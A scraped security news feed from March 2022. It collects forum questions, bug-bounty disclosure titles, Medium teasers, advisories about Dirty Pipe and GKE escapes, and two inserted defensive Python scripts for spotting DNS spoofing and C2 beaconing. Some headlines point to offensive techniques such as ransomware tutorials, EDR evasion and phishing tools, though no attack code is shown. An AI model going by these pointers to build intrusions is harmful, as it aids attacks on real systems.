    OK so the basics are that we're looking for a tool that we can use to group together and manage vulnerabilities found from multiple other sources/scanners (preferably open source). We're not looking for anything that will run its own scans; rather, something that manages already found reports... if that makes sense. At the moment, we're currently using an Excel spreadsheet to group everything together. If anyone has any suggestions that would be a life saver, thank you in advance. submitted by /u/Autumn-shadow [link] [comments]
    Sandvine technology for newbie
    Hello, my friend worked in the Blue Team domain as network security, mostly on firewalls, WAF, IPS and similar solutions. He lost his job earlier and saw an opening at Sandvine, which he applied for and got a call for an interview, but he is not sure what type of questions to expect. I'd appreciate it if anyone can advise what he should study and what type of questions and responses to expect. TIA submitted by /u/junostik [link] [comments]
    Conducting CMMC - NIST 800-171: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations at the company I work for
    Hey all, just started a job and I have to run some tests on use cases/artifacts/evidence scenarios. The company wants me to enter their IT Security Labs, and check items out of date such as routers, where firewalls are located, etc. There are 110 controls and I need to align a majority of the company's internal systems and processes with NIST 800-171 for CMMC. What is the best way to do this? submitted by /u/LordCommanderTaurusG [link] [comments]

    GraphQL cross-tenant IDOR giving write access through the operation UpdateAtlasApplicationPerson
    Stripe disclosed a bug submitted by bubbounty: https://hackerone.com/reports/1066203 - Bounty: $2500
    objectId in share location can be set to open arbitrary URL or Deeplinks
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1337178 - Bounty: $100
    PHP Info Exposing Secrets at https://radio.mtn.bj/info
    MTN Group disclosed a bug submitted by pudsec: https://hackerone.com/reports/1049402

    Phonebook, the way to DoS a company
    I had to add my personal info to a phonebook, which I don’t like, so I took down the server ;) Continue reading on InfoSec Write-ups »
    My Pentest Log -9- (Open Redirect Vulnerability)
    Greetings from Kerkoporta to all, Continue reading on Medium »
    Gallery Tryhackme Walkthrough part-1
    File uploading attack Continue reading on Medium »
    Log4shell in google $1337.00
    Looking through the Google Cloud console for products “https://console.cloud.google.com” to look for bugs, I came across VMware Engine. Continue reading on Medium »
    Full Account Takeover due to improper validation of old password
    Hello Hackers and Security community. I’m going to share how I was able to find the bug. Continue reading on Medium »
    ($$$) IDOR via GET Request which can SELL all User Products
    Hi everyone, Continue reading on Medium »
    Blind-XSS Disappointment
    Blind XSS is a relatively easy bug to find with the availability of tools like XSS-Hunter and Burp collaborator. Continue reading on Medium »
    OAuth Misconfiguration Leading to Account Takeover #Part 2
    Here are my bug bounty findings regarding OAuth Misconfiguration Leading to Account Takeover, Part 2 Continue reading on Medium »
    How I managed to make a DDoS attack by exploiting a company’s service — Bug Bounty
    Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to tell you about an event that happened to me while I was… Continue reading on Medium »
    Account Enumeration Hacking Tool Created in Python For Finding the Username Of Your Target Websites…
    Hi guys, in this tutorial you will learn how to create a Python script for finding the username of the admin panel of a target WordPress website and… Continue reading on Medium »

    Reversing embedded device bootloader (U-Boot) - p.1 - Shielder
    submitted by /u/smaury [link] [comments]
    Put an io_uring on it: Exploiting the Linux Kernel
    submitted by /u/eberkut [link] [comments]
    DomainProactive: Security Monitoring for Internet Presence
    submitted by /u/genemcculley [link] [comments]
    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    submitted by /u/AlexForster [link] [comments]
    Three critical 0-days allow RCE and even physical ignition in APC UPS
    submitted by /u/Subterminal303 [link] [comments]
    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    submitted by /u/YuvalAvra [link] [comments]
    PreAuth RCE in Passcom Cloud Phone Systems found by Kerbit Security Firm.
    submitted by /u/nathanAbejeM [link] [comments]

    Ukraine Invasion, Week 2 + more
    Welcome to the 3rd edition of the discursus Protest Analytics newsletter. Continue reading on discursus.io »
    Link to the Bellingcat Documentary — Truth in a Post-Truth World
    Sumbubotol.com, November 27, 2019 — Good news today. Sumbubotol.com congratulates Submarine Amsterdam, which successfully… Continue reading on Sumbu Botol »

    BHI: The Newest Spectre Vulnerability Affecting Intel and Arm CPUs
    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=BHI-Spectre-Vulnerability Comments URL: https://news.ycombinator.com/item?id=30603762 Points: 5 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://slashdot.org Comments URL: https://news.ycombinator.com/item?id=30601465 Points: 1 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://arstechnica.com/information-technology/2022/03/linux-has-been-bitten-by-its-most-high-severity-vulnerability-in-years/ Comments URL: https://news.ycombinator.com/item?id=30596044 Points: 39 # Comments: 10

    [Security Advisory] Linux DirtyPipe Local Privilege Escalation Vulnerability (CVE-2022-...
    A DirtyPipe local privilege escalation vulnerability in Linux has recently surfaced online; any unprivileged local user can use it to obtain root privileges. ...

    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    Article URL: https://blog.cloudflare.com/cve-2022-26143/ Comments URL: https://news.ycombinator.com/item?id=30602912 Points: 4 # Comments: 0
    Security advisory for the regex crate (CVE-2022-24713)
    Article URL: https://blog.rust-lang.org/2022/03/08/cve-2022-24713.html Comments URL: https://news.ycombinator.com/item?id=30600044 Points: 4 # Comments: 0

    Extended Attributes and TCC on macOS
    This blogpost will describe how Transparency, Consent, and Control (TCC) affects extended attributes on macOS Continue reading on Medium »

    What is life like as a female digital forensic investigator?
    I am just curious about how females go along in this field as I am currently doing a BSc in Business Management and Information systems and want to be a digital forensic investigator. submitted by /u/SkillKiller3010 [link] [comments]
    Internship Preparation Help for State Forensic Agency
    Hey everybody, I was lucky enough to be considered for a digital forensics internship position with my state's primary forensic agency. I've worked practice cases at my university using FTK and AXIOM, and I have research experience making a forensic image and working a case from beginning to end. Could anyone provide any tips to help me prepare for the interview? I have an incredible opportunity, and I want to make the most of it that I can. submitted by /u/Tuuin [link] [comments]

    SecWiki News 2022-03-08 Review
    Reverse Analysis and Reconstruction of User-Mode APIs by ourren; Symbols and Interpretation by ourren; The ROME Transformation Plan by ourren; How My Self-Hosted Gitea + Drone Instance Got Hijacked for Cryptomining by ourren; An Investigation of In-the-Wild Attacks on Container Security by ourren; ATT&CK In-the-Wild Data Analysis by Avenger. For more of the latest articles, visit SecWiki.

    Expanding the Hound: Introducing Plaintext Field to Compromised Accounts
    Introduction When doing an Internal Penetration Test, it is not uncommon to run BloodHound at one point or another. In case you are not familiar with BloodHound, it’s a tool that automatically fires off a bunch of LDAP queries and Windows API calls to collect various data in an Active Directory environment. Data can range... The post Expanding the Hound: Introducing Plaintext Field to Compromised Accounts appeared first on TrustedSec.

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »

    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    We disclosed several GKE Autopilot vulnerabilities and attack techniques to Google. The issues are now fixed – we provide a technical analysis. The post Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities appeared first on Unit42.

    New-Generation Banking Trojan SharkBot Is Spreading via the Play Store
    SharkBot is a banking trojan that can bypass multi-factor authentication mechanisms to steal bank account credentials.
    FreeBuf Morning Report | Google's request to dismiss data-breach lawsuit rejected; leaked NVIDIA data used to build malware
    Alphabet shareholders sued Google, alleging that Google deliberately concealed a security flaw that led to the leak of users' private data. In October 2018, US media reported that the incident exposed the personal data of nearly 500,000 Google+ users.
    Hackers Worldwide Drawn into the Ukraine-Russia Turmoil! What Lies Behind Digital Cyberwarfare Deserves Reflection
    This is the first global-scale hacker cyberwar of the digital age in which multiple nation-state hacking forces have entered the fray, taking nations as their targets and sabotaging core critical infrastructure! [Intro] On February 24, between Ukraine and Russia
    An Investigation of In-the-Wild Attacks on Container Security
    Cloud-native security companies are springing up like mushrooms after rain, and the major cloud vendors are also actively building their own cloud-native security capabilities to protect customers' assets in the cloud.
    Quick Read! 23 Major Cybercrime Statistics for 2021-2022
    Cybercrime has been on the rise since the COVID-19 pandemic. 锐成信息 (Racent), which focuses on cybersecurity, has compiled the most noteworthy cybercrime statistics of 2021 along with industry experts' predictions for internet security trends in 2022.
    Join the CIS 2021 Spring Edition Livestream on March 9, with a Shower of Red Envelopes Worth Ten Thousand Yuan Up for Grabs!
    At 9:30 a.m. on March 9-10, tune in to the official CIS 2021 Spring Edition site, where great talks and fantastic prize activities await you.
    Reflections on “Data-Centric” Data Security Practice
    From traditional industries such as telecom carriers, energy, healthcare and finance to the emerging internet industry, a wave of data-security building is under way.
    White Hat Interview | Hello everyone, I'm A-Yang, a full-time bug hunter!
    “Create with dreams and courage; prove it with conviction and effort.” Hello everyone, I'm A-Yang. I entered the security community by teaching myself penetration testing, and I'm now a full-time bug hunter on The loner security team, specializing in business-logic vulnerabilities, which has earned me generous bounties.
    Firefox Hit by Two More 0-Day Vulnerabilities; Upgrade as Soon as Possible
    Mozilla recently issued an out-of-band security update for the Firefox web browser covering two high-impact security vulnerabilities.
    Hacker Group Breaches Russian Media, Broadcasts Footage of the War in Ukraine
    Russian media outlets suffered a cyberattack and displayed footage of the war inside Ukraine.
    A Guide to Using Metasploit Locally
    When working on projects, spinning up a virtual machine every time is inconvenient, and low-spec machines start to lag with too much running in the background. Installing and using it locally is simply faster and more convenient and improves efficiency. It can also be deployed on a VPS or similar to make internal network penetration testing more convenient.
    FBI: 52 US Critical Infrastructure Entities Have Been Breached
    As of January 2022, the FBI has determined that, among the 10 critical infrastructure sectors attacked, at least 52 critical infrastructure entities were breached, spanning critical manufacturing, energy, financial services, government and information technology.
    Samsung Confirms Hackers Stole Galaxy Device Source Code
    Samsung confirmed on Monday that its network was breached by hackers and that confidential information, including source code for Galaxy phones, was stolen.
    Coinbase Is Blocking More Than 25,000 Crypto Addresses Linked to Russia
    On March 7, the popular cryptocurrency exchange Coinbase announced that it is blocking more than 25,000 cryptocurrency addresses associated with Russian individuals and entities.

    Movies from 1940 until last weekend! Busy site so starts slow (that’s what I’m blaming it on) lol
    submitted by /u/Yankeeslv [link] [comments]

    Courtesy of Republic of Bulgaria! - Part Two
    An image is worth a thousand words. Related posts: Courtesy of Republic of Bulgaria!; A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis; An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis; What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the


    Pentesting toolkit: all you need to know
    Red Teams use a comprehensive and complete toolkit to expose different platforms and get accurate results when reporting failures, data… Continue reading on Medium »
    Phishing Tools
    Phishing is one of the most serious threats in the digital world. Phishing makes fools of people. A phishing email always looks the same as the… Continue reading on Medium »

    Why do ISP ask for your SSN when signing up for their services?
    When I was signing up for Spectrum they asked for my SSN, and I gave it to them. How scared am I? submitted by /u/Empty-Ad1458 [link] [comments]
    What Windows based non Github program would allow me to brute force a TrueCrypt volume?
    Years ago I made some TrueCrypt volumes and forgot about them. I have now found them and forgotten some of the password. I know what the first half was and what some of the second half was but don't know where I put special characters or capital letters. I'm not good with GitHub, so is there a non-GitHub program that will let me enter the known parts, where I can tell it to try every possible character in certain spaces, and only the lowercase and uppercase of certain letters, i.e. m or M? submitted by /u/TerribleFruit [link] [comments]
    How to Fill My Knowledge Gaps as Quickly as Possible?
    I've been fascinated with cyber/net sec since I was a teenager who wanted to be a '1337 hax0r' (doesn't every nerdy teen wanna be one?). However, I went into Web Development. As I went I did have to learn about defensive coding techniques against SQL injection, path escalation, etc. I worked for financial, insurance and ISO270001 companies and thought I had a reasonable grasp of things since I'd done some sysadmin along the way installing Fail2Ban, Tripwire, etc. I even have the compact red, blue and purple team reference books and Parrot Sec on one partition I occasionally used to play with sec tools and have a Shodan account. I knew about Metasploit but had only done one tutorial. Fast forward to now: I need a career change after dev-burnout. I look into cyber sec and BOOM! Suddenly I see a ton of shit I've never seen before: SIEM? Mitre Att&ck? IoT Bots (have my ESP32 climate monitoring boards become an attack vector?!) TTPs? What on earth happened in the past few years that I missed? I barely recognise the industry anymore. I lifted my finger off the pulse for a few seconds and suddenly it's a different beast entirely. Can some kind soul point me to a good YouTube channel, guide, book, (free/cheap) course that will fill in the gaps I've missed the past few years? submitted by /u/adminsuckdonkeydick [link] [comments]
    Can exact ip addresses be spoofed?
    Recently noticed activity that I didn't really remember doing on an account, but it was from my exact IP address. I have a limited understanding of IP addresses, but spoofing a specific address isn't really possible, as you won't receive anything from the site you are trying to reach, correct? A proxy needs to be used, which is already a set "spoofed" IP, right? submitted by /u/SaucyBoiTybalt [link] [comments]
    How do I Remove FireEye from a Host?
    Does anyone know where I can find instructions or documentation about removing FireEye from a host? Specifically what registry keys should be deleted? Does anyone have experience with this request? Thank you for taking a look! submitted by /u/ELcup [link] [comments]
    Cyberstalking & Hacking
    Hey r/AskNetsec, I'm getting hacked by two lecturers at my university. I know this and do not want to call the police as I have no evidence of them hacking me. I'm a student and have no money to pay for a digital forensics investigation to be done. How do I stop them from hacking me? They're hacking all my devices and my family's devices. They also are hacking my email account using a cookie stealer. I have no idea how to stop this and this has become cyberstalking. I'm South African; I cannot contact the FBI or foreign charity organisations either. I don't want to involve the police since all they have to do is stop hacking me, and then I could get prosecuted for falsely accusing someone of committing a crime. Any advice or help with the situation would be appreciated. Best regards, Anon submitted by /u/Independent_Art_9954 [link] [comments]
    Ask for help, I think I was attacked by phishing
    A few days ago, I happened to see a message from Facebook. I went through the link without thinking and since then, I have received countless spam emails, and several times a day, I have been notified of membership registration and logout for sites that I do not need to log in to at all. After that, I found out that something was wrong. Perhaps I was attacked by phishing. The Facebook site on the link I entered was a well-made site very similar to the normal site. In addition, there was no doubt at all because it was possible to log in, search, and view news articles and content within the site. Banners, search windows, newsstand windows, login windows, and footers at the bottom were configured in a very similar way. And as a result, I had no choice but to renew all my personal contact information and e-mail addresses. I've only encountered the kind of writing that tells you to be careful of phishing sites, but I feel quite bad that I'm actually being attacked. Beyond feeling bad, it is creepy that other people view and use my personal information without permission. In order to prevent access to phishing sites and prevent personal information from being leaked, it is necessary to check if the domain is normal when receiving e-mails or text messages containing links. So I want to ask. What is a way to verify that it is a normal domain when receiving mail and text messages containing links? Is there a service or system that determines whether a link to a web page is normal or dangerous when I enter a suspicious link into a search box? submitted by /u/Late_Ice_9288 [link] [comments]
    Introduction to Networks materials
    Hey Everyone, I have a new mentee who wants to learn networking. She is completely from a non-IT background. Could you please suggest some good basic references/trainings that she can learn from? I know of some CCNA and CompTIA instructors who start from quite basic, but wanted to check if there is some other non-certification course that she can start with. submitted by /u/wackynerd14 [link] [comments]
    Potential DNS Attacks
    As this is a very hot topic, I'd like to prefix this with me saying I am trying to keep this 100% politics-free and strictly technology-related. That said, I read earlier today that there's a possibility of Russia forcing the use of their own DNS servers as of March 11: https://www.thetechoutlook.com/news/new-release/software-apps/breaking-news-russia-is-preparing-to-disconnect-from-the-global-internet I do not know the validity of the news itself, so I'm hoping to keep this strictly on the technical aspect in the case the order does happen. If we have vendors that hold offices in Russia and can access our VPN (let's also assume we do not have control over our vendor's offices): could this new order introduce any additional risks to our network? Our VPN should deny all requests with an invalid SSL certificate, but does anyone think the order could introduce any additional risk of DNS attacks? (at least directly?) Assuming users do not ignore SSL warnings, would this be any more of a concern than usual? Thanks in advance! submitted by /u/HPCer [link] [comments]

    GitHub - klezVirus/SysWhispers3: SysWhispers on Steroids - AV/EDR evasion via direct system calls.
    submitted by /u/dmchell [link] [comments]
    PROPHET SPIDER Exploits Citrix ShareFile Remote Code Execution Vulnerability CVE-2021-22941 to Deliver Webshell
    submitted by /u/dmchell [link] [comments]

    Palined Google OD search went down
    submitted by /u/Raven_Claw7621 [link] [comments]

    A new speed milestone for Chrome
    Everyday, billions of people around the world turn to Chrome to get things done quickly on their devices, whether shopping for a new pair of headphones or pulling together a sales report for work. Nothing is more frustrating than having a slow experience while browsing the web. That’s why Chrome has always been focused on building the fastest possible browser since its launch in 2008, without compromising on feature functionality or security. In our first The Fast and the Curious post of 2022, we are thrilled to celebrate how in the M99 release of Chrome we were able to substantially increase the speed of Chrome across all major platforms. We go deep on every platform where Chrome runs to provide the fastest possible experience. We’re excited to announce that in M99, Chrome on Mac has ach…
  • Open

    PHOTON
    (LET’S EXPLORE WEBSITE) Continue reading on Medium »
    Some critical vulnerabilities found with passive analysis on bug bounty programs explained
    This post describes three vulnerabilities found on paid bounty programs along with an overview about how it was found and the performed… Continue reading on InfoSec Write-ups »
    March OSINT Musings
    In light of the current events occurring in Ukraine now would be a good time to: Continue reading on Medium »
  • Open

    Critical cross-account vulnerability in Microsoft Azure automation service
    Article URL: https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30589845 Points: 213 # Comments: 41
    The Dirty Pipe Vulnerability
    Article URL: https://dirtypipe.cm4all.com/ Comments URL: https://news.ycombinator.com/item?id=30586740 Points: 673 # Comments: 232
  • Open

    Web Cache Poisoning leads to Stored XSS
    Glassdoor disclosed a bug submitted by bombon: https://hackerone.com/reports/1424094 - Bounty: $2000
  • Open

    SecWiki News 2022-03-07 Review
    A tour of outstanding ATT&CK projects by Avenger; SecWiki Weekly (Issue 418) by ourren; A talk on software engineering capability (video & slides) by ourren. For more recent articles, visit SecWiki
  • Open

    Web fuzzing tool written in python
    soon Continue reading on Medium »
  • Open

    Critical Cross-Account Vulnerability Found in Microsoft Azure Automation Service
    submitted by /u/FoShizzleMyWeasle
    The Dirty Pipe Vulnerability [CVE-2022-0847]
    submitted by /u/moviuro
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport
  • Open

    Computer Forensics and Investigation Project
    Hi Team, I need suggestions for any websites where I can find a reference scenario of a cybercrime where you have to do computer forensics on a victim's PC. For example a hacking incident: you have to verify or investigate how he/she was hacked. The report shall include the creation of a hypothetical scenario of a crime committed involving the said electronic device, as well as a detailed description of the forensic examination, tools used, procedure, and findings, evidenced with the necessary screenshots, and ensure all screenshots have the necessary verifiable names. This is a school project for my cybersecurity program and it is only my term 1. Thank you so much! submitted by /u/bankshot15
    Avoid modifying the smartphone evidence
    To present forensic analysis in court, we can't modify smartphone evidence. Although I have put the Android phone in airplane mode, I still worry about modifying smartphone data during Cellebrite UFED phone extraction. How do I avoid tampering with evidence during extraction? For Linux image analysis, I can mount as read-only; how about a smartphone? submitted by /u/cyberfo
    How do I get Laptop serial number from E01 image?
    Yep.. someone fucked up the chain of custody forms submitted by /u/MasterBet
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport
    DNS poisoning or DNS hijacking
    We encounter a lot of packets with small TTLs in our pcap files. Is this a symptom of a DNS poisoning attack, or DNS hijacking, or another DNS attack like DDoS? submitted by /u/cyberfo
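    A worked check for this kind of question, added here as an example and not part of the original post: the DNS responses below are constructed in memory in RFC 1035 wire format (no real pcap is read), and the resolver address 10.0.0.53 and the 30-second threshold are assumptions. A short TTL by itself is normal (CDNs and load balancers routinely serve TTLs of 60 seconds or less). What is worth a second look is a response for the same name that arrives from a resolver the client should not be talking to, or that carries a different answer set than the other responses for that name; the parser pulls out exactly those three signals.

```python
"""Parse DNS responses (RFC 1035 wire format) and flag the patterns that
separate a hijacked or spoofed answer from a merely short TTL.

Added example, not code from the original post.  The responses are
constructed below; the resolver 10.0.0.53 and the thresholds are assumptions.
"""
import struct
from collections import defaultdict


def build_response(txid, name, answers):
    """Constructed DNS response with A records; used only to make test data."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answers), 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode()
                     for label in name.split(".")) + b"\x00"
    question = qname + struct.pack("!HH", 1, 1)          # QTYPE=A, QCLASS=IN
    rrs = b""
    for ip, ttl in answers:
        rdata = bytes(int(o) for o in ip.split("."))
        # 0xC00C is a compression pointer back to the question name at offset 12
        rrs += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + rrs


def read_name(msg, off):
    """Decode a (possibly compressed) domain name; returns (name, next offset)."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                           # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = read_name(msg, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + length].decode())
        off += 1 + length


def parse_response(msg):
    """Return (queried name, [(ip, ttl), ...]) for the A records in a response."""
    _txid, _flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    name, off = read_name(msg, 12)
    off += 4                                                # skip QTYPE/QCLASS
    answers = []
    for _ in range(ancount):
        _, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1:                                      # A record
            answers.append((".".join(str(b) for b in rdata), ttl))
    return name, answers


def analyze(responses, expected_resolvers, low_ttl=30):
    """responses: [(resolver_ip, raw_message)].  Returns {name: [flags]}.

    'conflicting-answers' means two responses for the same name carried
    different answer sets.  Round-robin and CDN records do this too, so it is
    a lead to verify against a trusted resolver, not proof of poisoning.
    """
    per_name = defaultdict(lambda: {"sets": set(), "ttls": [], "resolvers": set()})
    for resolver, raw in responses:
        name, answers = parse_response(raw)
        rec = per_name[name]
        rec["sets"].add(frozenset(ip for ip, _ in answers))
        rec["ttls"].extend(ttl for _, ttl in answers)
        rec["resolvers"].add(resolver)
    findings = {}
    for name, rec in per_name.items():
        flags = []
        if len(rec["sets"]) > 1:
            flags.append("conflicting-answers")
        if rec["resolvers"] - set(expected_resolvers):
            flags.append("unexpected-resolver")
        if rec["ttls"] and min(rec["ttls"]) < low_ttl:
            flags.append("low-ttl")
        findings[name] = flags
    return findings


# Constructed sample: two normal answers from the corporate resolver, one
# answer for the same name from an unknown host with a different IP and a
# 5-second TTL, and a CDN name with two short-lived A records.
SAMPLE = [
    ("10.0.0.53", build_response(0x1A2B, "login.example.com", [("192.0.2.10", 300)])),
    ("10.0.0.53", build_response(0x1A2C, "login.example.com", [("192.0.2.10", 300)])),
    ("198.51.100.7", build_response(0x1A2D, "login.example.com", [("203.0.113.66", 5)])),
    ("10.0.0.53", build_response(0x1A2E, "cdn.example.net",
                                 [("192.0.2.40", 20), ("192.0.2.41", 20)])),
]

if __name__ == "__main__":
    for name, flags in analyze(SAMPLE, ["10.0.0.53"]).items():
        print(name, flags or "clean")
```

    Run against real traffic, feed analyze() the UDP payloads of the DNS replies together with the source address of each reply; the CDN name above comes out with only "low-ttl", which is the benign case, while the login name is flagged on all three signals.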
    how to detect C2 communication from log
    How do we detect C2 communication from logs? We have a method to detect beaconing, but now have difficulty detecting command-and-control commands. We have no clue; does anyone know how to detect it through Splunk logs? submitted by /u/cyberfo
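    An added example, not from the post and not Splunk SPL: the two measurements a beaconing search makes (period and inter-arrival jitter), run in Python over constructed proxy log lines, plus one heuristic for the "command" half of the question. The assumption, marked as such in the code, is that tasking shows up as a response-size outlier inside an otherwise regular beacon: the implant polls on a fixed period with near-identical request and response sizes, and the poll that actually carries a task is noticeably larger. The log format (epoch, src, dst, bytes out, bytes in) is constructed; map the fields to whatever your proxy emits.

```python
"""Beacon detection plus a tasking heuristic over proxy logs.

Added example, not code from the original post.  The log lines are
constructed; the thresholds and the 'large reply = task' heuristic are
assumptions to tune against your own data.
"""
import statistics
from collections import defaultdict

# Constructed sample log: "<epoch> <src> <dst> <bytes_out> <bytes_in>".
# 10.1.1.5 polls every ~60 s with a ~1 KB reply; one reply is 45 KB.
# 10.1.1.7 is ordinary irregular browsing to one host.
LOG = """\
1646650000 10.1.1.5 203.0.113.9 412 1020
1646650060 10.1.1.5 203.0.113.9 410 1021
1646650121 10.1.1.5 203.0.113.9 413 1019
1646650180 10.1.1.5 203.0.113.9 411 45880
1646650240 10.1.1.5 203.0.113.9 412 1020
1646650300 10.1.1.5 203.0.113.9 411 1022
1646650007 10.1.1.7 198.51.100.20 800 30000
1646650900 10.1.1.7 198.51.100.20 2300 5000
1646651400 10.1.1.7 198.51.100.20 500 120000
1646653000 10.1.1.7 198.51.100.20 2100 900
"""


def parse_log(text):
    """Group events by (src, dst) as (epoch, bytes_out, bytes_in) tuples."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, b_out, b_in = line.split()
        flows[(src, dst)].append((int(ts), int(b_out), int(b_in)))
    return flows


def analyze(flows, min_events=4, max_cv=0.2, size_factor=5):
    """Per-flow period, jitter (coefficient of variation) and tasking candidates.

    beacon  : enough events and inter-arrival jitter at or below max_cv.
              (Implants configured with large jitter push cv up; widen
              max_cv or bin by hour if your data needs it.)
    tasking : timestamps of replies larger than size_factor x the median
              reply in a beaconing flow, the assumed 'task delivered' poll.
    """
    results = {}
    for pair, events in flows.items():
        events = sorted(events)
        if len(events) < min_events:
            continue
        times = [e[0] for e in events]
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean else float("inf")
        beacon = cv <= max_cv
        tasking = []
        if beacon:
            median_in = statistics.median(e[2] for e in events)
            tasking = [e[0] for e in events if e[2] > size_factor * median_in]
        results[pair] = {"period": round(mean), "cv": round(cv, 3),
                         "beacon": beacon, "tasking": tasking}
    return results


if __name__ == "__main__":
    for pair, r in analyze(parse_log(LOG)).items():
        print(pair, r)
```

    The same shape translates to a scheduled search: group by source and destination, compute the inter-arrival statistics and the reply-size median per group, then alert on the outlier poll rather than on the beacon alone, which is the event you actually want an analyst to open.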
  • Open

    [THM] Bounty Hacker Writeup
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    B̶a̶k̶e̶ Hack your cake!
    [THM] Brooklyn Nine Nine Writeup
    All about Account Takeover
    Agent Sudo | TryHackMe Walkthrough
    Methods to Bypass two-factor Authentication
    Reset password Token led to account takeover
    How to Make Ransomware with Python
  • Open

    Implementing and applying zero-trust remote-work security technology
    A zero-trust remote-work security scheme can decouple access from the host machine and easily ensure the continuity of remote-work business.
    MIIT releases the "Guide to Building a Standards System for Connected-Vehicle Network Security and Data Security"
    By the end of 2023, an initial standards system for connected-vehicle network security and data security is to be in place; by 2025, a relatively complete one.
    Unveiling the APT36 group's CapraRAT malware
    We will keep introducing internationally notorious APT groups so that we can better understand and avoid their malware.
    A summary of network security vulnerability analysis
    Starting from the vulnerable point, analyze the vulnerability and learn some approaches to white-box vulnerability hunting along the way.
    CISA adds 95 new vulnerabilities to its Known Exploited Vulnerabilities catalog
    This week the US Cybersecurity and Infrastructure Security Agency (CISA) added 95 new security vulnerabilities to its catalog of exploited vulnerabilities, bringing the total to 478.
    It's 2022: are password managers still secure?
    This article re-examines password managers and answers several important questions about them.

  • Open

    Using Google hacking to search Telegram channels
    I was looking for pro-Putin channels on Telegram, using Google dorks. That this is also a practical example of using Google hacking… Continue reading on Medium »
    10 OSINT Tools Hackers Need to Know About
    Open source intelligence is a vital task for the red team and blue team alike. Here are some of the most useful OSINT tools. Continue reading on Medium »
    Send Google Alert To Slack
    Automatic Free Crawler By Google Continue reading on Medium »
    Final Recon — OSINT Tool for All-In-One Web Reconnaissance
    Final Recon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be… Continue reading on Medium »
  • Open

    help with making money
    Hey everyone, I would like to join the security game. I have a background in programming and in how computers and software work. What is the fastest way to make money in the security field? I'm here not only for money, I really like this field, but I need to make money fast; I have bills to pay and I can't get a job. I appreciate any help and guidance. submitted by /u/timet0fly
    AlienVault OSSIM - Step by Step Tuning after Installation
    Hi there, I'm interested in testing this SIEM for education purposes. I downloaded the latest version from the official site and installed it on VMware. But I stumbled upon the fact that I do not fully understand how best to configure everything. I did not find any in-depth step-by-step documentation on the official portal, and most likely I will miss a lot because of the undetailed documentation. Do I understand correctly that Suricata works out of the box? I don't need to install an agent on a Windows host? When I installed HIDS on my Windows host, I had a lot of weird events where the destination IP displayed is 0.0.0.0, and I don't even know how to make a rule so these events are not reflected. I googled and other people had such problems and there is no solution. For those who work a lot with this SIEM, perhaps from your experience you could share recommendations on what to do after installing it. I also haven't fully figured out how to run FIM. submitted by /u/athanielx
    Is it possible to be hacked by private networks/hidden SSIDS near your area?
    I believe my neighbors are watching me using private networks. I have an app that shows hidden SSIDs. I think they are using these networks to see and listen to what I'm doing on my devices. submitted by /u/AshuraSenkuu
    Potential drive-by 0-click 0-day on chrome
    There is an ongoing bug in Chrome that allows attackers to download files in the background onto the victim's machine without triggering any GUI updates. I first experienced this about two months ago when I was trying to close the browser only to be interrupted by a Chrome prompt informing me that there were ongoing downloads in the background that weren't started by me and displayed no sign of the downloading process in Chrome's GUI. I was a bit alarmed but I didn't pay it too much attention. Then I got curious when yesterday I had the same experience again; this time obviously I clicked 'continue downloads', I was taken to Chrome's download page where I found that Chrome had intercepted and flagged a 'malicious file' and it was offering me to either 'keep' or 'discard' said file, regrettably …
  • Open

    Frelatage: A new Coverage-Based Python fuzzing library
    Hello everyone! I am a 21-year-old French cybersecurity enthusiast and I would like to share with you Frelatage, which is a tool I wrote! It is a coverage-based Python fuzzing library which can be used to fuzz Python code. The development of Frelatage was inspired by various other fuzzers, including AFL/AFL++, Atheris and PyFuzzer. The main purpose of the project is to take advantage of the best features of these fuzzers and gather them together into a new tool in order to efficiently fuzz Python applications. Please note that the project is still in early alpha, and its development is very active, so any advice or suggestion is welcome! Install: https://github.com/Rog3rSm1th/Frelatage https://i.redd.it/m88potyk9tl81.gif submitted by /u/FrenchFuzzer
